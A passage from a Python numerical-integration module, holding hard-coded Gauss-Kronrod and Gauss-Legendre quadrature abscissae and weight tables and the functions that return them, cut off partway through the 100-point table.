[ 0.0000000000000000000000000, 0.0615808180678329350787598],
[ 0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.1228646926107103963873598, 0.0611285097170530483058590],
[ 0.1837189394210488920159699, 0.0605394553760458629453603],
[ 0.2438668837209884320451904, 0.0597203403241740599790993],
[ 0.3030895389311078301674789, 0.0586896800223942079619742],
[ 0.3611723058093878377358217, 0.0574371163615678328535827],
[ 0.4178853821930377488518144, 0.0559508112204123173082407],
[ 0.4730027314457149605221821, 0.0542511298885454901445434],
[ 0.5263252843347191825996238, 0.0523628858064074758643667],
[ 0.5776629302412229677236898, 0.0502776790807156719633253],
[ 0.6268100990103174127881227, 0.0479825371388367139063923],
[ 0.6735663684734683644851206, 0.0455029130499217889098706],
[ 0.7177664068130843881866541, 0.0428728450201700494768958],
[ 0.7592592630373576305772829, 0.0400838255040323820748393],
[ 0.7978737979985000594104109, 0.0371162714834155435603306],
[ 0.8334426287608340014210211, 0.0340021302743293378367488],
[ 0.8658470652932755954489970, 0.0307923001673874888911090],
[ 0.8949919978782753688510420, 0.0274753175878517378029485],
[ 0.9207471152817015617463461, 0.0240099456069532162200925],
[ 0.9429745712289743394140112, 0.0204353711458828354565683],
[ 0.9616149864258425124181300, 0.0168478177091282982315167],
[ 0.9766639214595175114983154, 0.0132362291955716748136564],
[ 0.9880357945340772476373310, 0.0094739733861741516072077],
[ 0.9955569697904980979087849, 0.0055619321353567137580402],
[ 0.9992621049926098341934575, 0.0019873838923303159265079]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
30: {
'g': np.array(
[[-0.9968934840746495402716301, 0.0079681924961666056154659],
[ -0.9836681232797472099700326, 0.0184664683110909591423021],
[ -0.9600218649683075122168710, 0.0287847078833233693497192],
[ -0.9262000474292743258793243, 0.0387991925696270495968019],
[ -0.8825605357920526815431165, 0.0484026728305940529029381],
[ -0.8295657623827683974428981, 0.0574931562176190664817217],
[ -0.7677774321048261949179773, 0.0659742298821804951281285],
[ -0.6978504947933157969322924, 0.0737559747377052062682439],
[ -0.6205261829892428611404776, 0.0807558952294202153546949],
[ -0.5366241481420198992641698, 0.0868997872010829798023875],
[ -0.4470337695380891767806099, 0.0921225222377861287176327],
[ -0.3527047255308781134710372, 0.0963687371746442596394686],
[ -0.2546369261678898464398051, 0.0995934205867952670627803],
[ -0.1538699136085835469637947, 0.1017623897484055045964290],
[ -0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.1538699136085835469637947, 0.1017623897484055045964290],
[ 0.2546369261678898464398051, 0.0995934205867952670627803],
[ 0.3527047255308781134710372, 0.0963687371746442596394686],
[ 0.4470337695380891767806099, 0.0921225222377861287176327],
[ 0.5366241481420198992641698, 0.0868997872010829798023875],
[ 0.6205261829892428611404776, 0.0807558952294202153546949],
[ 0.6978504947933157969322924, 0.0737559747377052062682439],
[ 0.7677774321048261949179773, 0.0659742298821804951281285],
[ 0.8295657623827683974428981, 0.0574931562176190664817217],
[ 0.8825605357920526815431165, 0.0484026728305940529029381],
[ 0.9262000474292743258793243, 0.0387991925696270495968019],
[ 0.9600218649683075122168710, 0.0287847078833233693497192],
[ 0.9836681232797472099700326, 0.0184664683110909591423021],
[ 0.9968934840746495402716301, 0.0079681924961666056154659]],
dtype=float),
'k': np.array(
[[-0.9994844100504906375713259, 0.0013890136986770076245516],
[ -0.9968934840746495402716301, 0.0038904611270998840512672],
[ -0.9916309968704045948586284, 0.0066307039159312921733198],
[ -0.9836681232797472099700326, 0.0092732796595177634284411],
[ -0.9731163225011262683746939, 0.0118230152534963417422329],
[ -0.9600218649683075122168710, 0.0143697295070458048124514],
[ -0.9443744447485599794158313, 0.0169208891890532726275723],
[ -0.9262000474292743258793243, 0.0194141411939423811734090],
[ -0.9055733076999077985465226, 0.0218280358216091922971675],
[ -0.8825605357920526815431165, 0.0241911620780806013656864],
[ -0.8572052335460610989586585, 0.0265099548823331016106017],
[ -0.8295657623827683974428981, 0.0287540487650412928439788],
[ -0.7997278358218390830136689, 0.0309072575623877624728843],
[ -0.7677774321048261949179773, 0.0329814470574837260318142],
[ -0.7337900624532268047261711, 0.0349793380280600241374997],
[ -0.6978504947933157969322924, 0.0368823646518212292239111],
[ -0.6600610641266269613700537, 0.0386789456247275929503487],
[ -0.6205261829892428611404776, 0.0403745389515359591119953],
[ -0.5793452358263616917560249, 0.0419698102151642461471475],
[ -0.5366241481420198992641698, 0.0434525397013560693168317],
[ -0.4924804678617785749936931, 0.0448148001331626631923556],
[ -0.4470337695380891767806099, 0.0460592382710069881162717],
[ -0.4004012548303943925354762, 0.0471855465692991539452615],
[ -0.3527047255308781134710372, 0.0481858617570871291407795],
[ -0.3040732022736250773726771, 0.0490554345550297788875282],
[ -0.2546369261678898464398051, 0.0497956834270742063578116],
[ -0.2045251166823098914389577, 0.0504059214027823468408931],
[ -0.1538699136085835469637947, 0.0508817958987496064922975],
[ -0.1028069379667370301470968, 0.0512215478492587721706563],
[ -0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.0000000000000000000000000, 0.0514947294294515675583404],
[ 0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.1028069379667370301470968, 0.0512215478492587721706563],
[ 0.1538699136085835469637947, 0.0508817958987496064922975],
[ 0.2045251166823098914389577, 0.0504059214027823468408931],
[ 0.2546369261678898464398051, 0.0497956834270742063578116],
[ 0.3040732022736250773726771, 0.0490554345550297788875282],
[ 0.3527047255308781134710372, 0.0481858617570871291407795],
[ 0.4004012548303943925354762, 0.0471855465692991539452615],
[ 0.4470337695380891767806099, 0.0460592382710069881162717],
[ 0.4924804678617785749936931, 0.0448148001331626631923556],
[ 0.5366241481420198992641698, 0.0434525397013560693168317],
[ 0.5793452358263616917560249, 0.0419698102151642461471475],
[ 0.6205261829892428611404776, 0.0403745389515359591119953],
[ 0.6600610641266269613700537, 0.0386789456247275929503487],
[ 0.6978504947933157969322924, 0.0368823646518212292239111],
[ 0.7337900624532268047261711, 0.0349793380280600241374997],
[ 0.7677774321048261949179773, 0.0329814470574837260318142],
[ 0.7997278358218390830136689, 0.0309072575623877624728843],
[ 0.8295657623827683974428981, 0.0287540487650412928439788],
[ 0.8572052335460610989586585, 0.0265099548823331016106017],
[ 0.8825605357920526815431165, 0.0241911620780806013656864],
[ 0.9055733076999077985465226, 0.0218280358216091922971675],
[ 0.9262000474292743258793243, 0.0194141411939423811734090],
[ 0.9443744447485599794158313, 0.0169208891890532726275723],
[ 0.9600218649683075122168710, 0.0143697295070458048124514],
[ 0.9731163225011262683746939, 0.0118230152534963417422329],
[ 0.9836681232797472099700326, 0.0092732796595177634284411],
[ 0.9916309968704045948586284, 0.0066307039159312921733198],
[ 0.9968934840746495402716301, 0.0038904611270998840512672],
[ 0.9994844100504906375713259, 0.0013890136986770076245516]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False], dtype=bool)
},
}
w = weights[n]
dup=w['dup']
xi = w['k'][:,0]
wi1 = np.zeros_like(xi)
wi1[dup] = w['g'][:, 1]
wi2 = w['k'][:,1]
return xi, wi1, wi2
def gauss_legendre_abscissae_and_weights(n):
"""Gauss-Legendre quadrature abscissae and weights
Integral = Sum(f(xi) * wi)
Parameters
----------
n : [2-20, 32, 64, 100]
Number of integration points
Returns
-------
xi, wi : 1d array of len(n)
Abscissae and weights for numericla integration
References
----------
.. [1] Holoborodko, Pavel. 2014. 'Numerical Integration'. Accessed
April 24.
http://www.holoborodko.com/pavel/numerical-methods/numerical-integration/.
"""
if n not in [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
32, 64, 100]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
2: np.array(
[[-0.5773502691896257645091488, 1.0000000000000000000000000],
[ 0.5773502691896257645091488, 1.0000000000000000000000000]],
dtype=float),
3: np.array(
[[-0.7745966692414833770358531, 0.5555555555555555555555556],
[ 0, 0.8888888888888888888888889],
[ 0.7745966692414833770358531, 0.5555555555555555555555556]],
dtype=float),
4: np.array(
[[-0.8611363115940525752239465, 0.3478548451374538573730639],
[ -0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.8611363115940525752239465, 0.3478548451374538573730639]],
dtype=float),
5: np.array(
[[-0.9061798459386639927976269, 0.2369268850561890875142640],
[ -0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0, 0.5688888888888888888888889],
[ 0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0.9061798459386639927976269, 0.2369268850561890875142640]],
dtype=float),
6: np.array(
[[-0.9324695142031520278123016, 0.1713244923791703450402961],
[ -0.6612093864662645136613996, 0.3607615730481386075698335],
[ -0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.6612093864662645136613996, 0.3607615730481386075698335],
[ 0.9324695142031520278123016, 0.1713244923791703450402961]],
dtype=float),
7: np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
8: np.array(
[[-0.9602898564975362316835609, 0.1012285362903762591525314],
[ -0.7966664774136267395915539, 0.2223810344533744705443560],
[ -0.5255324099163289858177390, 0.3137066458778872873379622],
[ -0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.5255324099163289858177390, 0.3137066458778872873379622],
[ 0.7966664774136267395915539, 0.2223810344533744705443560],
[ 0.9602898564975362316835609, 0.1012285362903762591525314]],
dtype=float),
9: np.array(
[[-0.9681602395076260898355762, 0.0812743883615744119718922],
[ -0.8360311073266357942994298, 0.1806481606948574040584720],
[ -0.6133714327005903973087020, 0.2606106964029354623187429],
[ -0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0, 0.3302393550012597631645251],
[ 0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0.6133714327005903973087020, 0.2606106964029354623187429],
[ 0.8360311073266357942994298, 0.1806481606948574040584720],
[ 0.9681602395076260898355762, 0.0812743883615744119718922]],
dtype=float),
10: np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
11: np.array(
[[-0.9782286581460569928039380, 0.0556685671161736664827537],
[ -0.8870625997680952990751578, 0.1255803694649046246346943],
[ -0.7301520055740493240934163, 0.1862902109277342514260976],
[ -0.5190961292068118159257257, 0.2331937645919904799185237],
[ -0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0, 0.2729250867779006307144835],
[ 0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0.5190961292068118159257257, 0.2331937645919904799185237],
[ 0.7301520055740493240934163, 0.1862902109277342514260976],
[ 0.8870625997680952990751578, 0.1255803694649046246346943],
[ 0.9782286581460569928039380, 0.0556685671161736664827537]],
dtype=float),
12: np.array(
[[-0.9815606342467192506905491, 0.0471753363865118271946160],
[ -0.9041172563704748566784659, 0.1069393259953184309602547],
[ -0.7699026741943046870368938, 0.1600783285433462263346525],
[ -0.5873179542866174472967024, 0.2031674267230659217490645],
[ -0.3678314989981801937526915, 0.2334925365383548087608499],
[ -0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.3678314989981801937526915, 0.2334925365383548087608499],
[ 0.5873179542866174472967024, 0.2031674267230659217490645],
[ 0.7699026741943046870368938, 0.1600783285433462263346525],
[ 0.9041172563704748566784659, 0.1069393259953184309602547],
[ 0.9815606342467192506905491, 0.0471753363865118271946160]],
dtype=float),
13: np.array(
[[-0.9841830547185881494728294, 0.0404840047653158795200216],
[ -0.9175983992229779652065478, 0.0921214998377284479144218],
[ -0.8015780907333099127942065, 0.1388735102197872384636018],
[ -0.6423493394403402206439846, 0.1781459807619457382800467],
[ -0.4484927510364468528779129, 0.2078160475368885023125232],
[ -0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0, 0.2325515532308739101945895],
[ 0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0.4484927510364468528779129, 0.2078160475368885023125232],
[ 0.6423493394403402206439846, 0.1781459807619457382800467],
[ 0.8015780907333099127942065, 0.1388735102197872384636018],
[ 0.9175983992229779652065478, 0.0921214998377284479144218],
[ 0.9841830547185881494728294, 0.0404840047653158795200216]],
dtype=float),
14: np.array(
[[-0.9862838086968123388415973, 0.0351194603317518630318329],
[ -0.9284348836635735173363911, 0.0801580871597602098056333],
[ -0.8272013150697649931897947, 0.1215185706879031846894148],
[ -0.6872929048116854701480198, 0.1572031671581935345696019],
[ -0.5152486363581540919652907, 0.1855383974779378137417166],
[ -0.3191123689278897604356718, 0.2051984637212956039659241],
[ -0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.3191123689278897604356718, 0.2051984637212956039659241],
[ 0.5152486363581540919652907, 0.1855383974779378137417166],
[ 0.6872929048116854701480198, 0.1572031671581935345696019],
[ 0.8272013150697649931897947, 0.1215185706879031846894148],
[ 0.9284348836635735173363911, 0.0801580871597602098056333],
[ 0.9862838086968123388415973, 0.0351194603317518630318329]],
dtype=float),
15: np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
16: np.array(
[[-0.9894009349916499325961542, 0.0271524594117540948517806],
[ -0.9445750230732325760779884, 0.0622535239386478928628438],
[ -0.8656312023878317438804679, 0.0951585116824927848099251],
[ -0.7554044083550030338951012, 0.1246289712555338720524763],
[ -0.6178762444026437484466718, 0.1495959888165767320815017],
[ -0.4580167776572273863424194, 0.1691565193950025381893121],
[ -0.2816035507792589132304605, 0.1826034150449235888667637],
[ -0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.2816035507792589132304605, 0.1826034150449235888667637],
[ 0.4580167776572273863424194, 0.1691565193950025381893121],
[ 0.6178762444026437484466718, 0.1495959888165767320815017],
[ 0.7554044083550030338951012, 0.1246289712555338720524763],
[ 0.8656312023878317438804679, 0.0951585116824927848099251],
[ 0.9445750230732325760779884, 0.0622535239386478928628438],
[ 0.9894009349916499325961542, 0.0271524594117540948517806]],
dtype=float),
17: np.array(
[[-0.9905754753144173356754340, 0.0241483028685479319601100],
[ -0.9506755217687677612227170, 0.0554595293739872011294402],
[ -0.8802391537269859021229557, 0.0850361483171791808835354],
[ -0.7815140038968014069252301, 0.1118838471934039710947884],
[ -0.6576711592166907658503022, 0.1351363684685254732863200],
[ -0.5126905370864769678862466, 0.1540457610768102880814316],
[ -0.3512317634538763152971855, 0.1680041021564500445099707],
[ -0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0, 0.1794464703562065254582656],
[ 0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0.3512317634538763152971855, 0.1680041021564500445099707],
[ 0.5126905370864769678862466, 0.1540457610768102880814316],
[ 0.6576711592166907658503022, 0.1351363684685254732863200],
[ 0.7815140038968014069252301, 0.1118838471934039710947884],
[ 0.8802391537269859021229557, 0.0850361483171791808835354],
[ 0.9506755217687677612227170, 0.0554595293739872011294402],
[ 0.9905754753144173356754340, 0.0241483028685479319601100]],
dtype=float),
18: np.array(
[[-0.9915651684209309467300160, 0.0216160135264833103133427],
[ -0.9558239495713977551811959, 0.0497145488949697964533349],
[ -0.8926024664975557392060606, 0.0764257302548890565291297],
[ -0.8037049589725231156824175, 0.1009420441062871655628140],
[ -0.6916870430603532078748911, 0.1225552067114784601845191],
[ -0.5597708310739475346078715, 0.1406429146706506512047313],
[ -0.4117511614628426460359318, 0.1546846751262652449254180],
[ -0.2518862256915055095889729, 0.1642764837458327229860538],
[ -0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.2518862256915055095889729, 0.1642764837458327229860538],
[ 0.4117511614628426460359318, 0.1546846751262652449254180],
[ 0.5597708310739475346078715, 0.1406429146706506512047313],
[ 0.6916870430603532078748911, 0.1225552067114784601845191],
[ 0.8037049589725231156824175, 0.1009420441062871655628140],
[ 0.8926024664975557392060606, 0.0764257302548890565291297],
[ 0.9558239495713977551811959, 0.0497145488949697964533349],
[ 0.9915651684209309467300160, 0.0216160135264833103133427]],
dtype=float),
19: np.array(
[[-0.9924068438435844031890177, 0.0194617882297264770363120],
[ -0.9602081521348300308527788, 0.0448142267656996003328382],
[ -0.9031559036148179016426609, 0.0690445427376412265807083],
[ -0.8227146565371428249789225, 0.0914900216224499994644621],
[ -0.7209661773352293786170959, 0.1115666455473339947160239],
[ -0.6005453046616810234696382, 0.1287539625393362276755158],
[ -0.4645707413759609457172671, 0.1426067021736066117757461],
[ -0.3165640999636298319901173, 0.1527660420658596667788554],
[ -0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0, 0.1610544498487836959791636],
[ 0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0.3165640999636298319901173, 0.1527660420658596667788554],
[ 0.4645707413759609457172671, 0.1426067021736066117757461],
[ 0.6005453046616810234696382, 0.1287539625393362276755158],
[ 0.7209661773352293786170959, 0.1115666455473339947160239],
[ 0.8227146565371428249789225, 0.0914900216224499994644621],
[ 0.9031559036148179016426609, 0.0690445427376412265807083],
[ 0.9602081521348300308527788, 0.0448142267656996003328382],
[ 0.9924068438435844031890177, 0.0194617882297264770363120]],
dtype=float),
20: np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
32: np.array(
[[-0.9972638618494815635449811, 0.0070186100094700966004071],
[ -0.9856115115452683354001750, 0.0162743947309056706051706],
[ -0.9647622555875064307738119, 0.0253920653092620594557526],
[ -0.9349060759377396891709191, 0.0342738629130214331026877],
[ -0.8963211557660521239653072, 0.0428358980222266806568786],
[ -0.8493676137325699701336930, 0.0509980592623761761961632],
[ -0.7944837959679424069630973, 0.0586840934785355471452836],
[ -0.7321821187402896803874267, 0.0658222227763618468376501],
[ -0.6630442669302152009751152, 0.0723457941088485062253994],
[ -0.5877157572407623290407455, 0.0781938957870703064717409],
[ -0.5068999089322293900237475, 0.0833119242269467552221991],
[ -0.4213512761306353453641194, 0.0876520930044038111427715],
[ -0.3318686022821276497799168, 0.0911738786957638847128686],
[ -0.2392873622521370745446032, 0.0938443990808045656391802],
[ -0.1444719615827964934851864, 0.0956387200792748594190820],
[ -0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.1444719615827964934851864, 0.0956387200792748594190820],
[ 0.2392873622521370745446032, 0.0938443990808045656391802],
[ 0.3318686022821276497799168, 0.0911738786957638847128686],
[ 0.4213512761306353453641194, 0.0876520930044038111427715],
[ 0.5068999089322293900237475, 0.0833119242269467552221991],
[ 0.5877157572407623290407455, 0.0781938957870703064717409],
[ 0.6630442669302152009751152, 0.0723457941088485062253994],
[ 0.7321821187402896803874267, 0.0658222227763618468376501],
[ 0.7944837959679424069630973, 0.0586840934785355471452836],
[ 0.8493676137325699701336930, 0.0509980592623761761961632],
[ 0.8963211557660521239653072, 0.0428358980222266806568786],
[ 0.9349060759377396891709191, 0.0342738629130214331026877],
[ 0.9647622555875064307738119, 0.0253920653092620594557526],
[ 0.9856115115452683354001750, 0.0162743947309056706051706],
[ 0.9972638618494815635449811, 0.0070186100094700966004071]],
dtype=float),
64: np.array(
[[-0.9993050417357721394569056, 0.0017832807216964329472961],
[ -0.9963401167719552793469245, 0.0041470332605624676352875],
[ -0.9910133714767443207393824, 0.0065044579689783628561174],
[ -0.9833362538846259569312993, 0.0088467598263639477230309],
[ -0.9733268277899109637418535, 0.0111681394601311288185905],
[ -0.9610087996520537189186141, 0.0134630478967186425980608],
[ -0.9464113748584028160624815, 0.0157260304760247193219660],
[ -0.9295691721319395758214902, 0.0179517157756973430850453],
[ -0.9105221370785028057563807, 0.0201348231535302093723403],
[ -0.8893154459951141058534040, 0.0222701738083832541592983],
[ -0.8659993981540928197607834, 0.0243527025687108733381776],
[ -0.8406292962525803627516915, 0.0263774697150546586716918],
[ -0.8132653151227975597419233, 0.0283396726142594832275113],
[ -0.7839723589433414076102205, 0.0302346570724024788679741],
[ -0.7528199072605318966118638, 0.0320579283548515535854675],
[ -0.7198818501716108268489402, 0.0338051618371416093915655],
[ -0.6852363130542332425635584, 0.0354722132568823838106931],
[ -0.6489654712546573398577612, 0.0370551285402400460404151],
[ -0.6111553551723932502488530, 0.0385501531786156291289625],
[ -0.5718956462026340342838781, 0.0399537411327203413866569],
[ -0.5312794640198945456580139, 0.0412625632426235286101563],
[ -0.4894031457070529574785263, 0.0424735151236535890073398],
[ -0.4463660172534640879849477, 0.0435837245293234533768279],
[ -0.4022701579639916036957668, 0.0445905581637565630601347],
[ -0.3572201583376681159504426, 0.0454916279274181444797710],
[ -0.3113228719902109561575127, 0.0462847965813144172959532],
[ -0.2646871622087674163739642, 0.0469681828162100173253263],
[ -0.2174236437400070841496487, 0.0475401657148303086622822],
[ -0.1696444204239928180373136, 0.0479993885964583077281262],
[ -0.1214628192961205544703765, 0.0483447622348029571697695],
[ -0.0729931217877990394495429, 0.0485754674415034269347991],
[ -0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0729931217877990394495429, 0.0485754674415034269347991],
[ 0.1214628192961205544703765, 0.0483447622348029571697695],
[ 0.1696444204239928180373136, 0.0479993885964583077281262],
[ 0.2174236437400070841496487, 0.0475401657148303086622822],
[ 0.2646871622087674163739642, 0.0469681828162100173253263],
[ 0.3113228719902109561575127, 0.0462847965813144172959532],
[ 0.3572201583376681159504426, 0.0454916279274181444797710],
[ 0.4022701579639916036957668, 0.0445905581637565630601347],
[ 0.4463660172534640879849477, 0.0435837245293234533768279],
[ 0.4894031457070529574785263, 0.0424735151236535890073398],
[ 0.5312794640198945456580139, 0.0412625632426235286101563],
[ 0.5718956462026340342838781, 0.0399537411327203413866569],
[ 0.6111553551723932502488530, 0.0385501531786156291289625],
[ 0.6489654712546573398577612, 0.0370551285402400460404151],
[ 0.6852363130542332425635584, 0.0354722132568823838106931],
[ 0.7198818501716108268489402, 0.0338051618371416093915655],
[ 0.7528199072605318966118638, 0.0320579283548515535854675],
[ 0.7839723589433414076102205, 0.0302346570724024788679741],
[ 0.8132653151227975597419233, 0.0283396726142594832275113],
[ 0.8406292962525803627516915, 0.0263774697150546586716918],
[ 0.8659993981540928197607834, 0.0243527025687108733381776],
[ 0.8893154459951141058534040, 0.0222701738083832541592983],
[ 0.9105221370785028057563807, 0.0201348231535302093723403],
[ 0.9295691721319395758214902, 0.0179517157756973430850453],
[ 0.9464113748584028160624815, 0.0157260304760247193219660],
[ 0.9610087996520537189186141, 0.0134630478967186425980608],
[ 0.9733268277899109637418535, 0.0111681394601311288185905],
[ 0.9833362538846259569312993, 0.0088467598263639477230309],
[ 0.9910133714767443207393824, 0.0065044579689783628561174],
[ 0.9963401167719552793469245, 0.0041470332605624676352875],
[ 0.9993050417357721394569056, 0.0017832807216964329472961]],
dtype=float),
100: np.array(
[[-0.9997137267734412336782285, 0.0007346344905056717304063],
[ -0.9984919506395958184001634, 0.0017093926535181052395294],
[ -0.9962951347331251491861317, 0.0026839253715534824194396],
[ -0.9931249370374434596520099, 0.0036559612013263751823425],
[ -0.9889843952429917480044187, 0.0046244500634221193510958],
[ -0.9838775407060570154961002, 0.0055884280038655151572119],
[ -0.9778093584869182885537811, 0.0065469484508453227641521],
[ -0.9707857757637063319308979, 0.0074990732554647115788287],
[ -0.9628136542558155272936593, 0.0084438714696689714026208],
[ -0.9539007829254917428493369, 0.0093804196536944579514182],
[ -0.9440558701362559779627747, 0.0103078025748689695857821],
[ -0.9332885350430795459243337, 0.0112251140231859771172216],
[ -0.9216092981453339526669513, 0.0121314576629794974077448],
[ -0.9090295709825296904671263, 0.0130259478929715422855586],
[ -0.8955616449707269866985210, 0.0139077107037187726879541],
[ -0.8812186793850184155733168, 0.0147758845274413017688800],
[ -0.8660146884971646234107400, 0.0156296210775460027239369],
[ -0.8499645278795912842933626, 0.0164680861761452126431050],
[ -0.8330838798884008235429158, 0.0172904605683235824393442],
[ -0.8153892383391762543939888, 0.0180959407221281166643908],
[ -0.7968978923903144763895729, 0.0188837396133749045529412],
[ -0.7776279096494954756275514, 0.0196530874944353058653815],
[ -0.7575981185197071760356680, 0.0204032326462094327668389],
[ -0.7368280898020207055124277, 0.0211334421125276415426723],
[ -0.7153381175730564464599671, 0.0218430024162473863139537],
[ -0.6931491993558019659486479, 0.0225312202563362727017970],
[ -0.6702830156031410158025870, 0.0231974231852541216224889],
[ -0.6467619085141292798326303, 0.0238409602659682059625604],
[ -0.6226088602037077716041908, 0.0244612027079570527199750],
[ -0.5978474702471787212648065, 0.0250575444815795897037642],
[ -0.5725019326213811913168704, 0.0256294029102081160756420],
[ -0.5465970120650941674679943, 0.0261762192395456763423087],
[ -0.5201580198817630566468157, 0.0266974591835709626603847],
[ -0.4932107892081909335693088, 0.0271926134465768801364916],
[ -0.4657816497733580422492166, 0.0276611982207923882942042],
[ -0.4378974021720315131089780, 0.0281027556591011733176483],
[ -0.4095852916783015425288684, 0.0285168543223950979909368],
[ -0.3808729816246299567633625, 0.0289030896011252031348762],
[ -0.3517885263724217209723438, 0.0292610841106382766201190],
[ -0.3223603439005291517224766, 0.0295904880599126425117545],
[ -0.2926171880384719647375559, 0.0298909795933328309168368],
[ -0.2625881203715034791689293, 0.0301622651051691449190687],
[ -0.2323024818449739696495100, 0.0304040795264548200165079],
[ -0.2017898640957359972360489, 0.0306161865839804484964594],
[ -0.1710800805386032748875324, 0.0307983790311525904277139],
[ -0.1402031372361139732075146, 0.0309504788504909882340635],
[ -0.1091892035800611150034260, 0.0310723374275665165878102],
[ -0.0780685828134366366948174, 0.0311638356962099067838183],
[ -0.0468716824215916316149239, 0.0312248842548493577323765],
[ -0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0468716824215916316149239, 0.0312248842548493577323765],
[ 0.0780685828134366366948174, 0.0311638356962099067838183],
[ 0.1091892035800611150034260, 0.0310723374275665165878102],
[ 0.1402031372361139732075146, 0.0309504788504909882340635],
[ 0.1710800805386032748875324, 0.0307983790311525904277139],
[ 0.2017898640957359972360489, 0.0306161865839804484964594],
[ 0.2323024818449739696495100, 0.0304040795264548200165079],
[ 0.2625881203715034791689293, 0.0301622651051691449190687],
[ 0.2926171880384719647375559, 0.0298909795933328309168368],
[ 0.3223603439005291517224766, 0.0295904880599126425117545],
[ 0.3517885263724217209723438, 0.0292610841106382766201190],
